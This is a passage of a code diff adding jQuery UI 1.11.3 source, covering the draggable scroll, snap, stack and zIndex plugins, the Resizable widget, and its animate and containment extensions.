+		if ( !i.scrollParentNotHidden ) {
+			i.scrollParentNotHidden = i.helper.scrollParent( false );
+		}
+
+		if ( i.scrollParentNotHidden[ 0 ] !== i.document[ 0 ] && i.scrollParentNotHidden[ 0 ].tagName !== "HTML" ) {
+			i.overflowOffset = i.scrollParentNotHidden.offset();
+		}
+	},
+	drag: function( event, ui, i  ) {
+
+		var o = i.options,
+			scrolled = false,
+			scrollParent = i.scrollParentNotHidden[ 0 ],
+			document = i.document[ 0 ];
+
+		if ( scrollParent !== document && scrollParent.tagName !== "HTML" ) {
+			if ( !o.axis || o.axis !== "x" ) {
+				if ( ( i.overflowOffset.top + scrollParent.offsetHeight ) - event.pageY < o.scrollSensitivity ) {
+					scrollParent.scrollTop = scrolled = scrollParent.scrollTop + o.scrollSpeed;
+				} else if ( event.pageY - i.overflowOffset.top < o.scrollSensitivity ) {
+					scrollParent.scrollTop = scrolled = scrollParent.scrollTop - o.scrollSpeed;
+				}
+			}
+
+			if ( !o.axis || o.axis !== "y" ) {
+				if ( ( i.overflowOffset.left + scrollParent.offsetWidth ) - event.pageX < o.scrollSensitivity ) {
+					scrollParent.scrollLeft = scrolled = scrollParent.scrollLeft + o.scrollSpeed;
+				} else if ( event.pageX - i.overflowOffset.left < o.scrollSensitivity ) {
+					scrollParent.scrollLeft = scrolled = scrollParent.scrollLeft - o.scrollSpeed;
+				}
+			}
+
+		} else {
+
+			if (!o.axis || o.axis !== "x") {
+				if (event.pageY - $(document).scrollTop() < o.scrollSensitivity) {
+					scrolled = $(document).scrollTop($(document).scrollTop() - o.scrollSpeed);
+				} else if ($(window).height() - (event.pageY - $(document).scrollTop()) < o.scrollSensitivity) {
+					scrolled = $(document).scrollTop($(document).scrollTop() + o.scrollSpeed);
+				}
+			}
+
+			if (!o.axis || o.axis !== "y") {
+				if (event.pageX - $(document).scrollLeft() < o.scrollSensitivity) {
+					scrolled = $(document).scrollLeft($(document).scrollLeft() - o.scrollSpeed);
+				} else if ($(window).width() - (event.pageX - $(document).scrollLeft()) < o.scrollSensitivity) {
+					scrolled = $(document).scrollLeft($(document).scrollLeft() + o.scrollSpeed);
+				}
+			}
+
+		}
+
+		if (scrolled !== false && $.ui.ddmanager && !o.dropBehaviour) {
+			$.ui.ddmanager.prepareOffsets(i, event);
+		}
+
+	}
+});
+
+$.ui.plugin.add("draggable", "snap", {
+	start: function( event, ui, i ) {
+
+		var o = i.options;
+
+		i.snapElements = [];
+
+		$(o.snap.constructor !== String ? ( o.snap.items || ":data(ui-draggable)" ) : o.snap).each(function() {
+			var $t = $(this),
+				$o = $t.offset();
+			if (this !== i.element[0]) {
+				i.snapElements.push({
+					item: this,
+					width: $t.outerWidth(), height: $t.outerHeight(),
+					top: $o.top, left: $o.left
+				});
+			}
+		});
+
+	},
+	drag: function( event, ui, inst ) {
+
+		var ts, bs, ls, rs, l, r, t, b, i, first,
+			o = inst.options,
+			d = o.snapTolerance,
+			x1 = ui.offset.left, x2 = x1 + inst.helperProportions.width,
+			y1 = ui.offset.top, y2 = y1 + inst.helperProportions.height;
+
+		for (i = inst.snapElements.length - 1; i >= 0; i--){
+
+			l = inst.snapElements[i].left - inst.margins.left;
+			r = l + inst.snapElements[i].width;
+			t = inst.snapElements[i].top - inst.margins.top;
+			b = t + inst.snapElements[i].height;
+
+			if ( x2 < l - d || x1 > r + d || y2 < t - d || y1 > b + d || !$.contains( inst.snapElements[ i ].item.ownerDocument, inst.snapElements[ i ].item ) ) {
+				if (inst.snapElements[i].snapping) {
+					(inst.options.snap.release && inst.options.snap.release.call(inst.element, event, $.extend(inst._uiHash(), { snapItem: inst.snapElements[i].item })));
+				}
+				inst.snapElements[i].snapping = false;
+				continue;
+			}
+
+			if (o.snapMode !== "inner") {
+				ts = Math.abs(t - y2) <= d;
+				bs = Math.abs(b - y1) <= d;
+				ls = Math.abs(l - x2) <= d;
+				rs = Math.abs(r - x1) <= d;
+				if (ts) {
+					ui.position.top = inst._convertPositionTo("relative", { top: t - inst.helperProportions.height, left: 0 }).top;
+				}
+				if (bs) {
+					ui.position.top = inst._convertPositionTo("relative", { top: b, left: 0 }).top;
+				}
+				if (ls) {
+					ui.position.left = inst._convertPositionTo("relative", { top: 0, left: l - inst.helperProportions.width }).left;
+				}
+				if (rs) {
+					ui.position.left = inst._convertPositionTo("relative", { top: 0, left: r }).left;
+				}
+			}
+
+			first = (ts || bs || ls || rs);
+
+			if (o.snapMode !== "outer") {
+				ts = Math.abs(t - y1) <= d;
+				bs = Math.abs(b - y2) <= d;
+				ls = Math.abs(l - x1) <= d;
+				rs = Math.abs(r - x2) <= d;
+				if (ts) {
+					ui.position.top = inst._convertPositionTo("relative", { top: t, left: 0 }).top;
+				}
+				if (bs) {
+					ui.position.top = inst._convertPositionTo("relative", { top: b - inst.helperProportions.height, left: 0 }).top;
+				}
+				if (ls) {
+					ui.position.left = inst._convertPositionTo("relative", { top: 0, left: l }).left;
+				}
+				if (rs) {
+					ui.position.left = inst._convertPositionTo("relative", { top: 0, left: r - inst.helperProportions.width }).left;
+				}
+			}
+
+			if (!inst.snapElements[i].snapping && (ts || bs || ls || rs || first)) {
+				(inst.options.snap.snap && inst.options.snap.snap.call(inst.element, event, $.extend(inst._uiHash(), { snapItem: inst.snapElements[i].item })));
+			}
+			inst.snapElements[i].snapping = (ts || bs || ls || rs || first);
+
+		}
+
+	}
+});
+
+$.ui.plugin.add("draggable", "stack", {
+	start: function( event, ui, instance ) {
+		var min,
+			o = instance.options,
+			group = $.makeArray($(o.stack)).sort(function(a, b) {
+				return (parseInt($(a).css("zIndex"), 10) || 0) - (parseInt($(b).css("zIndex"), 10) || 0);
+			});
+
+		if (!group.length) { return; }
+
+		min = parseInt($(group[0]).css("zIndex"), 10) || 0;
+		$(group).each(function(i) {
+			$(this).css("zIndex", min + i);
+		});
+		this.css("zIndex", (min + group.length));
+	}
+});
+
+$.ui.plugin.add("draggable", "zIndex", {
+	start: function( event, ui, instance ) {
+		var t = $( ui.helper ),
+			o = instance.options;
+
+		if (t.css("zIndex")) {
+			o._zIndex = t.css("zIndex");
+		}
+		t.css("zIndex", o.zIndex);
+	},
+	stop: function( event, ui, instance ) {
+		var o = instance.options;
+
+		if (o._zIndex) {
+			$(ui.helper).css("zIndex", o._zIndex);
+		}
+	}
+});
+
+var draggable = $.ui.draggable;
+
+
+/*!
+ * jQuery UI Resizable 1.11.3
+ * http://jqueryui.com
+ *
+ * Copyright jQuery Foundation and other contributors
+ * Released under the MIT license.
+ * http://jquery.org/license
+ *
+ * http://api.jqueryui.com/resizable/
+ */
+
+
+$.widget("ui.resizable", $.ui.mouse, {
+	version: "1.11.3",
+	widgetEventPrefix: "resize",
+	options: {
+		alsoResize: false,
+		animate: false,
+		animateDuration: "slow",
+		animateEasing: "swing",
+		aspectRatio: false,
+		autoHide: false,
+		containment: false,
+		ghost: false,
+		grid: false,
+		handles: "e,s,se",
+		helper: false,
+		maxHeight: null,
+		maxWidth: null,
+		minHeight: 10,
+		minWidth: 10,
+		// See #7960
+		zIndex: 90,
+
+		// callbacks
+		resize: null,
+		start: null,
+		stop: null
+	},
+
+	_num: function( value ) {
+		return parseInt( value, 10 ) || 0;
+	},
+
+	_isNumber: function( value ) {
+		return !isNaN( parseInt( value, 10 ) );
+	},
+
+	_hasScroll: function( el, a ) {
+
+		if ( $( el ).css( "overflow" ) === "hidden") {
+			return false;
+		}
+
+		var scroll = ( a && a === "left" ) ? "scrollLeft" : "scrollTop",
+			has = false;
+
+		if ( el[ scroll ] > 0 ) {
+			return true;
+		}
+
+		// TODO: determine which cases actually cause this to happen
+		// if the element doesn't have the scroll set, see if it's possible to
+		// set the scroll
+		el[ scroll ] = 1;
+		has = ( el[ scroll ] > 0 );
+		el[ scroll ] = 0;
+		return has;
+	},
+
+	_create: function() {
+
+		var n, i, handle, axis, hname,
+			that = this,
+			o = this.options;
+		this.element.addClass("ui-resizable");
+
+		$.extend(this, {
+			_aspectRatio: !!(o.aspectRatio),
+			aspectRatio: o.aspectRatio,
+			originalElement: this.element,
+			_proportionallyResizeElements: [],
+			_helper: o.helper || o.ghost || o.animate ? o.helper || "ui-resizable-helper" : null
+		});
+
+		// Wrap the element if it cannot hold child nodes
+		if (this.element[0].nodeName.match(/^(canvas|textarea|input|select|button|img)$/i)) {
+
+			this.element.wrap(
+				$("<div class='ui-wrapper' style='overflow: hidden;'></div>").css({
+					position: this.element.css("position"),
+					width: this.element.outerWidth(),
+					height: this.element.outerHeight(),
+					top: this.element.css("top"),
+					left: this.element.css("left")
+				})
+			);
+
+			this.element = this.element.parent().data(
+				"ui-resizable", this.element.resizable( "instance" )
+			);
+
+			this.elementIsWrapper = true;
+
+			this.element.css({
+				marginLeft: this.originalElement.css("marginLeft"),
+				marginTop: this.originalElement.css("marginTop"),
+				marginRight: this.originalElement.css("marginRight"),
+				marginBottom: this.originalElement.css("marginBottom")
+			});
+			this.originalElement.css({
+				marginLeft: 0,
+				marginTop: 0,
+				marginRight: 0,
+				marginBottom: 0
+			});
+			// support: Safari
+			// Prevent Safari textarea resize
+			this.originalResizeStyle = this.originalElement.css("resize");
+			this.originalElement.css("resize", "none");
+
+			this._proportionallyResizeElements.push( this.originalElement.css({
+				position: "static",
+				zoom: 1,
+				display: "block"
+			}) );
+
+			// support: IE9
+			// avoid IE jump (hard set the margin)
+			this.originalElement.css({ margin: this.originalElement.css("margin") });
+
+			this._proportionallyResize();
+		}
+
+		this.handles = o.handles ||
+			( !$(".ui-resizable-handle", this.element).length ?
+				"e,s,se" : {
+					n: ".ui-resizable-n",
+					e: ".ui-resizable-e",
+					s: ".ui-resizable-s",
+					w: ".ui-resizable-w",
+					se: ".ui-resizable-se",
+					sw: ".ui-resizable-sw",
+					ne: ".ui-resizable-ne",
+					nw: ".ui-resizable-nw"
+				} );
+
+		if (this.handles.constructor === String) {
+
+			if ( this.handles === "all") {
+				this.handles = "n,e,s,w,se,sw,ne,nw";
+			}
+
+			n = this.handles.split(",");
+			this.handles = {};
+
+			for (i = 0; i < n.length; i++) {
+
+				handle = $.trim(n[i]);
+				hname = "ui-resizable-" + handle;
+				axis = $("<div class='ui-resizable-handle " + hname + "'></div>");
+
+				axis.css({ zIndex: o.zIndex });
+
+				// TODO : What's going on here?
+				if ("se" === handle) {
+					axis.addClass("ui-icon ui-icon-gripsmall-diagonal-se");
+				}
+
+				this.handles[handle] = ".ui-resizable-" + handle;
+				this.element.append(axis);
+			}
+
+		}
+
+		this._renderAxis = function(target) {
+
+			var i, axis, padPos, padWrapper;
+
+			target = target || this.element;
+
+			for (i in this.handles) {
+
+				if (this.handles[i].constructor === String) {
+					this.handles[i] = this.element.children( this.handles[ i ] ).first().show();
+				}
+
+				if (this.elementIsWrapper && this.originalElement[0].nodeName.match(/^(textarea|input|select|button)$/i)) {
+
+					axis = $(this.handles[i], this.element);
+
+					padWrapper = /sw|ne|nw|se|n|s/.test(i) ? axis.outerHeight() : axis.outerWidth();
+
+					padPos = [ "padding",
+						/ne|nw|n/.test(i) ? "Top" :
+						/se|sw|s/.test(i) ? "Bottom" :
+						/^e$/.test(i) ? "Right" : "Left" ].join("");
+
+					target.css(padPos, padWrapper);
+
+					this._proportionallyResize();
+
+				}
+
+				// TODO: What's that good for? There's not anything to be executed left
+				if (!$(this.handles[i]).length) {
+					continue;
+				}
+			}
+		};
+
+		// TODO: make renderAxis a prototype function
+		this._renderAxis(this.element);
+
+		this._handles = $(".ui-resizable-handle", this.element)
+			.disableSelection();
+
+		this._handles.mouseover(function() {
+			if (!that.resizing) {
+				if (this.className) {
+					axis = this.className.match(/ui-resizable-(se|sw|ne|nw|n|e|s|w)/i);
+				}
+				that.axis = axis && axis[1] ? axis[1] : "se";
+			}
+		});
+
+		if (o.autoHide) {
+			this._handles.hide();
+			$(this.element)
+				.addClass("ui-resizable-autohide")
+				.mouseenter(function() {
+					if (o.disabled) {
+						return;
+					}
+					$(this).removeClass("ui-resizable-autohide");
+					that._handles.show();
+				})
+				.mouseleave(function() {
+					if (o.disabled) {
+						return;
+					}
+					if (!that.resizing) {
+						$(this).addClass("ui-resizable-autohide");
+						that._handles.hide();
+					}
+				});
+		}
+
+		this._mouseInit();
+
+	},
+
+	_destroy: function() {
+
+		this._mouseDestroy();
+
+		var wrapper,
+			_destroy = function(exp) {
+				$(exp)
+					.removeClass("ui-resizable ui-resizable-disabled ui-resizable-resizing")
+					.removeData("resizable")
+					.removeData("ui-resizable")
+					.unbind(".resizable")
+					.find(".ui-resizable-handle")
+						.remove();
+			};
+
+		// TODO: Unwrap at same DOM position
+		if (this.elementIsWrapper) {
+			_destroy(this.element);
+			wrapper = this.element;
+			this.originalElement.css({
+				position: wrapper.css("position"),
+				width: wrapper.outerWidth(),
+				height: wrapper.outerHeight(),
+				top: wrapper.css("top"),
+				left: wrapper.css("left")
+			}).insertAfter( wrapper );
+			wrapper.remove();
+		}
+
+		this.originalElement.css("resize", this.originalResizeStyle);
+		_destroy(this.originalElement);
+
+		return this;
+	},
+
+	_mouseCapture: function(event) {
+		var i, handle,
+			capture = false;
+
+		for (i in this.handles) {
+			handle = $(this.handles[i])[0];
+			if (handle === event.target || $.contains(handle, event.target)) {
+				capture = true;
+			}
+		}
+
+		return !this.options.disabled && capture;
+	},
+
+	_mouseStart: function(event) {
+
+		var curleft, curtop, cursor,
+			o = this.options,
+			el = this.element;
+
+		this.resizing = true;
+
+		this._renderProxy();
+
+		curleft = this._num(this.helper.css("left"));
+		curtop = this._num(this.helper.css("top"));
+
+		if (o.containment) {
+			curleft += $(o.containment).scrollLeft() || 0;
+			curtop += $(o.containment).scrollTop() || 0;
+		}
+
+		this.offset = this.helper.offset();
+		this.position = { left: curleft, top: curtop };
+
+		this.size = this._helper ? {
+				width: this.helper.width(),
+				height: this.helper.height()
+			} : {
+				width: el.width(),
+				height: el.height()
+			};
+
+		this.originalSize = this._helper ? {
+				width: el.outerWidth(),
+				height: el.outerHeight()
+			} : {
+				width: el.width(),
+				height: el.height()
+			};
+
+		this.sizeDiff = {
+			width: el.outerWidth() - el.width(),
+			height: el.outerHeight() - el.height()
+		};
+
+		this.originalPosition = { left: curleft, top: curtop };
+		this.originalMousePosition = { left: event.pageX, top: event.pageY };
+
+		this.aspectRatio = (typeof o.aspectRatio === "number") ?
+			o.aspectRatio :
+			((this.originalSize.width / this.originalSize.height) || 1);
+
+		cursor = $(".ui-resizable-" + this.axis).css("cursor");
+		$("body").css("cursor", cursor === "auto" ? this.axis + "-resize" : cursor);
+
+		el.addClass("ui-resizable-resizing");
+		this._propagate("start", event);
+		return true;
+	},
+
+	_mouseDrag: function(event) {
+
+		var data, props,
+			smp = this.originalMousePosition,
+			a = this.axis,
+			dx = (event.pageX - smp.left) || 0,
+			dy = (event.pageY - smp.top) || 0,
+			trigger = this._change[a];
+
+		this._updatePrevProperties();
+
+		if (!trigger) {
+			return false;
+		}
+
+		data = trigger.apply(this, [ event, dx, dy ]);
+
+		this._updateVirtualBoundaries(event.shiftKey);
+		if (this._aspectRatio || event.shiftKey) {
+			data = this._updateRatio(data, event);
+		}
+
+		data = this._respectSize(data, event);
+
+		this._updateCache(data);
+
+		this._propagate("resize", event);
+
+		props = this._applyChanges();
+
+		if ( !this._helper && this._proportionallyResizeElements.length ) {
+			this._proportionallyResize();
+		}
+
+		if ( !$.isEmptyObject( props ) ) {
+			this._updatePrevProperties();
+			this._trigger( "resize", event, this.ui() );
+			this._applyChanges();
+		}
+
+		return false;
+	},
+
+	_mouseStop: function(event) {
+
+		this.resizing = false;
+		var pr, ista, soffseth, soffsetw, s, left, top,
+			o = this.options, that = this;
+
+		if (this._helper) {
+
+			pr = this._proportionallyResizeElements;
+			ista = pr.length && (/textarea/i).test(pr[0].nodeName);
+			soffseth = ista && this._hasScroll(pr[0], "left") ? 0 : that.sizeDiff.height;
+			soffsetw = ista ? 0 : that.sizeDiff.width;
+
+			s = {
+				width: (that.helper.width()  - soffsetw),
+				height: (that.helper.height() - soffseth)
+			};
+			left = (parseInt(that.element.css("left"), 10) +
+				(that.position.left - that.originalPosition.left)) || null;
+			top = (parseInt(that.element.css("top"), 10) +
+				(that.position.top - that.originalPosition.top)) || null;
+
+			if (!o.animate) {
+				this.element.css($.extend(s, { top: top, left: left }));
+			}
+
+			that.helper.height(that.size.height);
+			that.helper.width(that.size.width);
+
+			if (this._helper && !o.animate) {
+				this._proportionallyResize();
+			}
+		}
+
+		$("body").css("cursor", "auto");
+
+		this.element.removeClass("ui-resizable-resizing");
+
+		this._propagate("stop", event);
+
+		if (this._helper) {
+			this.helper.remove();
+		}
+
+		return false;
+
+	},
+
+	_updatePrevProperties: function() {
+		this.prevPosition = {
+			top: this.position.top,
+			left: this.position.left
+		};
+		this.prevSize = {
+			width: this.size.width,
+			height: this.size.height
+		};
+	},
+
+	_applyChanges: function() {
+		var props = {};
+
+		if ( this.position.top !== this.prevPosition.top ) {
+			props.top = this.position.top + "px";
+		}
+		if ( this.position.left !== this.prevPosition.left ) {
+			props.left = this.position.left + "px";
+		}
+		if ( this.size.width !== this.prevSize.width ) {
+			props.width = this.size.width + "px";
+		}
+		if ( this.size.height !== this.prevSize.height ) {
+			props.height = this.size.height + "px";
+		}
+
+		this.helper.css( props );
+
+		return props;
+	},
+
+	_updateVirtualBoundaries: function(forceAspectRatio) {
+		var pMinWidth, pMaxWidth, pMinHeight, pMaxHeight, b,
+			o = this.options;
+
+		b = {
+			minWidth: this._isNumber(o.minWidth) ? o.minWidth : 0,
+			maxWidth: this._isNumber(o.maxWidth) ? o.maxWidth : Infinity,
+			minHeight: this._isNumber(o.minHeight) ? o.minHeight : 0,
+			maxHeight: this._isNumber(o.maxHeight) ? o.maxHeight : Infinity
+		};
+
+		if (this._aspectRatio || forceAspectRatio) {
+			pMinWidth = b.minHeight * this.aspectRatio;
+			pMinHeight = b.minWidth / this.aspectRatio;
+			pMaxWidth = b.maxHeight * this.aspectRatio;
+			pMaxHeight = b.maxWidth / this.aspectRatio;
+
+			if (pMinWidth > b.minWidth) {
+				b.minWidth = pMinWidth;
+			}
+			if (pMinHeight > b.minHeight) {
+				b.minHeight = pMinHeight;
+			}
+			if (pMaxWidth < b.maxWidth) {
+				b.maxWidth = pMaxWidth;
+			}
+			if (pMaxHeight < b.maxHeight) {
+				b.maxHeight = pMaxHeight;
+			}
+		}
+		this._vBoundaries = b;
+	},
+
+	_updateCache: function(data) {
+		this.offset = this.helper.offset();
+		if (this._isNumber(data.left)) {
+			this.position.left = data.left;
+		}
+		if (this._isNumber(data.top)) {
+			this.position.top = data.top;
+		}
+		if (this._isNumber(data.height)) {
+			this.size.height = data.height;
+		}
+		if (this._isNumber(data.width)) {
+			this.size.width = data.width;
+		}
+	},
+
+	_updateRatio: function( data ) {
+
+		var cpos = this.position,
+			csize = this.size,
+			a = this.axis;
+
+		if (this._isNumber(data.height)) {
+			data.width = (data.height * this.aspectRatio);
+		} else if (this._isNumber(data.width)) {
+			data.height = (data.width / this.aspectRatio);
+		}
+
+		if (a === "sw") {
+			data.left = cpos.left + (csize.width - data.width);
+			data.top = null;
+		}
+		if (a === "nw") {
+			data.top = cpos.top + (csize.height - data.height);
+			data.left = cpos.left + (csize.width - data.width);
+		}
+
+		return data;
+	},
+
+	_respectSize: function( data ) {
+
+		var o = this._vBoundaries,
+			a = this.axis,
+			ismaxw = this._isNumber(data.width) && o.maxWidth && (o.maxWidth < data.width),
+			ismaxh = this._isNumber(data.height) && o.maxHeight && (o.maxHeight < data.height),
+			isminw = this._isNumber(data.width) && o.minWidth && (o.minWidth > data.width),
+			isminh = this._isNumber(data.height) && o.minHeight && (o.minHeight > data.height),
+			dw = this.originalPosition.left + this.originalSize.width,
+			dh = this.position.top + this.size.height,
+			cw = /sw|nw|w/.test(a), ch = /nw|ne|n/.test(a);
+		if (isminw) {
+			data.width = o.minWidth;
+		}
+		if (isminh) {
+			data.height = o.minHeight;
+		}
+		if (ismaxw) {
+			data.width = o.maxWidth;
+		}
+		if (ismaxh) {
+			data.height = o.maxHeight;
+		}
+
+		if (isminw && cw) {
+			data.left = dw - o.minWidth;
+		}
+		if (ismaxw && cw) {
+			data.left = dw - o.maxWidth;
+		}
+		if (isminh && ch) {
+			data.top = dh - o.minHeight;
+		}
+		if (ismaxh && ch) {
+			data.top = dh - o.maxHeight;
+		}
+
+		// Fixing jump error on top/left - bug #2330
+		if (!data.width && !data.height && !data.left && data.top) {
+			data.top = null;
+		} else if (!data.width && !data.height && !data.top && data.left) {
+			data.left = null;
+		}
+
+		return data;
+	},
+
+	_getPaddingPlusBorderDimensions: function( element ) {
+		var i = 0,
+			widths = [],
+			borders = [
+				element.css( "borderTopWidth" ),
+				element.css( "borderRightWidth" ),
+				element.css( "borderBottomWidth" ),
+				element.css( "borderLeftWidth" )
+			],
+			paddings = [
+				element.css( "paddingTop" ),
+				element.css( "paddingRight" ),
+				element.css( "paddingBottom" ),
+				element.css( "paddingLeft" )
+			];
+
+		for ( ; i < 4; i++ ) {
+			widths[ i ] = ( parseInt( borders[ i ], 10 ) || 0 );
+			widths[ i ] += ( parseInt( paddings[ i ], 10 ) || 0 );
+		}
+
+		return {
+			height: widths[ 0 ] + widths[ 2 ],
+			width: widths[ 1 ] + widths[ 3 ]
+		};
+	},
+
+	_proportionallyResize: function() {
+
+		if (!this._proportionallyResizeElements.length) {
+			return;
+		}
+
+		var prel,
+			i = 0,
+			element = this.helper || this.element;
+
+		for ( ; i < this._proportionallyResizeElements.length; i++) {
+
+			prel = this._proportionallyResizeElements[i];
+
+			// TODO: Seems like a bug to cache this.outerDimensions
+			// considering that we are in a loop.
+			if (!this.outerDimensions) {
+				this.outerDimensions = this._getPaddingPlusBorderDimensions( prel );
+			}
+
+			prel.css({
+				height: (element.height() - this.outerDimensions.height) || 0,
+				width: (element.width() - this.outerDimensions.width) || 0
+			});
+
+		}
+
+	},
+
+	_renderProxy: function() {
+
+		var el = this.element, o = this.options;
+		this.elementOffset = el.offset();
+
+		if (this._helper) {
+
+			this.helper = this.helper || $("<div style='overflow:hidden;'></div>");
+
+			this.helper.addClass(this._helper).css({
+				width: this.element.outerWidth() - 1,
+				height: this.element.outerHeight() - 1,
+				position: "absolute",
+				left: this.elementOffset.left + "px",
+				top: this.elementOffset.top + "px",
+				zIndex: ++o.zIndex //TODO: Don't modify option
+			});
+
+			this.helper
+				.appendTo("body")
+				.disableSelection();
+
+		} else {
+			this.helper = this.element;
+		}
+
+	},
+
+	_change: {
+		e: function(event, dx) {
+			return { width: this.originalSize.width + dx };
+		},
+		w: function(event, dx) {
+			var cs = this.originalSize, sp = this.originalPosition;
+			return { left: sp.left + dx, width: cs.width - dx };
+		},
+		n: function(event, dx, dy) {
+			var cs = this.originalSize, sp = this.originalPosition;
+			return { top: sp.top + dy, height: cs.height - dy };
+		},
+		s: function(event, dx, dy) {
+			return { height: this.originalSize.height + dy };
+		},
+		se: function(event, dx, dy) {
+			return $.extend(this._change.s.apply(this, arguments),
+				this._change.e.apply(this, [ event, dx, dy ]));
+		},
+		sw: function(event, dx, dy) {
+			return $.extend(this._change.s.apply(this, arguments),
+				this._change.w.apply(this, [ event, dx, dy ]));
+		},
+		ne: function(event, dx, dy) {
+			return $.extend(this._change.n.apply(this, arguments),
+				this._change.e.apply(this, [ event, dx, dy ]));
+		},
+		nw: function(event, dx, dy) {
+			return $.extend(this._change.n.apply(this, arguments),
+				this._change.w.apply(this, [ event, dx, dy ]));
+		}
+	},
+
+	_propagate: function(n, event) {
+		$.ui.plugin.call(this, n, [ event, this.ui() ]);
+		(n !== "resize" && this._trigger(n, event, this.ui()));
+	},
+
+	plugins: {},
+
+	ui: function() {
+		return {
+			originalElement: this.originalElement,
+			element: this.element,
+			helper: this.helper,
+			position: this.position,
+			size: this.size,
+			originalSize: this.originalSize,
+			originalPosition: this.originalPosition
+		};
+	}
+
+});
+
+/*
+ * Resizable Extensions
+ */
+
+$.ui.plugin.add("resizable", "animate", {
+
+	stop: function( event ) {
+		var that = $(this).resizable( "instance" ),
+			o = that.options,
+			pr = that._proportionallyResizeElements,
+			ista = pr.length && (/textarea/i).test(pr[0].nodeName),
+			soffseth = ista && that._hasScroll(pr[0], "left") ? 0 : that.sizeDiff.height,
+			soffsetw = ista ? 0 : that.sizeDiff.width,
+			style = { width: (that.size.width - soffsetw), height: (that.size.height - soffseth) },
+			left = (parseInt(that.element.css("left"), 10) +
+				(that.position.left - that.originalPosition.left)) || null,
+			top = (parseInt(that.element.css("top"), 10) +
+				(that.position.top - that.originalPosition.top)) || null;
+
+		that.element.animate(
+			$.extend(style, top && left ? { top: top, left: left } : {}), {
+				duration: o.animateDuration,
+				easing: o.animateEasing,
+				step: function() {
+
+					var data = {
+						width: parseInt(that.element.css("width"), 10),
+						height: parseInt(that.element.css("height"), 10),
+						top: parseInt(that.element.css("top"), 10),
+						left: parseInt(that.element.css("left"), 10)
+					};
+
+					if (pr && pr.length) {
+						$(pr[0]).css({ width: data.width, height: data.height });
+					}
+
+					// propagating resize, and updating values for each animation step
+					that._updateCache(data);
+					that._propagate("resize", event);
+
+				}
+			}
+		);
+	}
+
+});
+
+$.ui.plugin.add( "resizable", "containment", {
+
+	start: function() {
+		var element, p, co, ch, cw, width, height,
+			that = $( this ).resizable( "instance" ),
+			o = that.options,
+			el = that.element,
+			oc = o.containment,
+			ce = ( oc instanceof $ ) ? oc.get( 0 ) : ( /parent/.test( oc ) ) ? el.parent().get( 0 ) : oc;
+
+		if ( !ce ) {
+			return;
+		}
+
+		that.containerElement = $( ce );
+
+		if ( /document/.test( oc ) || oc === document ) {
+			that.containerOffset = {
+				left: 0,
+				top: 0
+			};
+			that.containerPosition = {
+				left: 0,
+				top: 0
+			};
+
+			that.parentData = {
+				element: $( document ),
+				left: 0,
+				top: 0,
+				width: $( document ).width(),
+				height: $( document ).height() || document.body.parentNode.scrollHeight
+			};
+		} else {
+			element = $( ce );
+			p = [];
+			$([ "Top", "Right", "Left", "Bottom" ]).each(function( i, name ) {
+				p[ i ] = that._num( element.css( "padding" + name ) );
+			});
+
+			that.containerOffset = element.offset();
+			that.containerPosition = element.position();
+			that.containerSize = {
+				height: ( element.innerHeight() - p[ 3 ] ),
+				width: ( element.innerWidth() - p[ 1 ] )
+			};
+
+			co = that.containerOffset;
+			ch = that.containerSize.height;
+			cw = that.containerSize.width;
+			width = ( that._hasScroll ( ce, "left" ) ? ce.scrollWidth : cw );
+			height = ( that._hasScroll ( ce ) ? ce.scrollHeight : ch ) ;
+
+			that.parentData = {
+				element: ce,
+				left: co.left,
+				top: co.top,
+				width: width,
+				height: height
+			};
+		}
+	},
+
+	resize: function( event ) {
+		var woset, hoset, isParent, isOffsetRelative,
+			that = $( this ).resizable( "instance" ),
+			o = that.options,
+			co = that.containerOffset,
+			cp = that.position,
+			pRatio = that._aspectRatio || event.shiftKey,
+			cop = {
+				top: 0,
+				left: 0
+			},
+			ce = that.containerElement,
+			continueResize = true;
+
+		if ( ce[ 0 ] !== document && ( /static/ ).test( ce.css( "position" ) ) ) {
+			cop = co;
+		}
+
+		if ( cp.left < ( that._helper ? co.left : 0 ) ) {
+			that.size.width = that.size.width +
+				( that._helper ?
+					( that.position.left - co.left ) :
+					( that.position.left - cop.left ) );
+
+			if ( pRatio ) {
+				that.size.height = that.size.width / that.aspectRatio;
+				continueResize = false;
+			}
+			that.position.left = o.helper ? co.left : 0;
+		}
+
+		if ( cp.top < ( that._helper ? co.top : 0 ) ) {
+			that.size.height = that.size.height +
+				( that._helper ?
+					( that.position.top - co.top ) :
+					that.position.top );
+
+			if ( pRatio ) {
+				that.size.width = that.size.height * that.aspectRatio;
+				continueResize = false;
+			}
+			that.position.top = that._helper ? co.top : 0;
+		}
+
+		isParent = that.containerElement.get( 0 ) === that.element.parent().get( 0 );
+		isOffsetRelative = /relative|absolute/.test( that.containerElement.css( "position" ) );
+
+		if ( isParent && isOffsetRelative ) {
+			that.offset.left = that.parentData.left + that.position.left;
+			that.offset.top = that.parentData.top + that.position.top;
+		} else {
+			that.offset.left = that.element.offset().left;
+			that.offset.top = that.element.offset().top;
+		}
+
+		woset = Math.abs( that.sizeDiff.width +
+			(that._helper ?
+				that.offset.left - cop.left :
+				(that.offset.left - co.left)) );
+
+		hoset = Math.abs( that.sizeDiff.height +
+			(that._helper ?
+				that.offset.top - cop.top :
+				(that.offset.top - co.top)) );
+
+		if ( woset + that.size.width >= that.parentData.width ) {
+			that.size.width = that.parentData.width - woset;
+			if ( pRatio ) {
+				that.size.height = that.size.width / that.aspectRatio;
+				continueResize = false;
+			}
+		}
+
+		if ( hoset + that.size.height >= that.parentData.height ) {
+			that.size.height = that.parentData.height - hoset;
+			if ( pRatio ) {
+				that.size.width = that.size.height * that.aspectRatio;
+				continueResize = false;
+			}
+		}
+
+		if ( !continueResize ) {
+			that.position.left = that.prevPosition.left;
+			that.position.top = that.prevPosition.top;
+			that.size.width = that.prevSize.width;
+			that.size.height = that.prevSize.height;
+		}
+	},
+
+	stop: function() {
+		var that = $( this ).resizable( "instance" ),
+			o = that.options,
+			co = that.containerOffset,
+			cop = that.containerPosition,
+			ce = that.containerElement,
+			helper = $( that.helper ),
+			ho = helper.offset(),
+			w = helper.outerWidth() - that.sizeDiff.width,
+			h = helper.outerHeight() - that.sizeDiff.height;
+
+		if ( that._helper && !o.animate && ( /relative/ ).test( ce.css( "position" ) ) ) {
+			$( this ).css({
+				left: ho.left - cop.left - co.left,
+				width: w,
+				height: h
+			});
+		}
+
+		if ( that._helper && !o.animate && ( /static/ ).test( ce.css( "position" ) ) ) {
+			$( this ).css({
+				left: ho.left - cop.left - co.left,
+				width: w,
+				height: h
+			});
+		}
+	}
+});
+
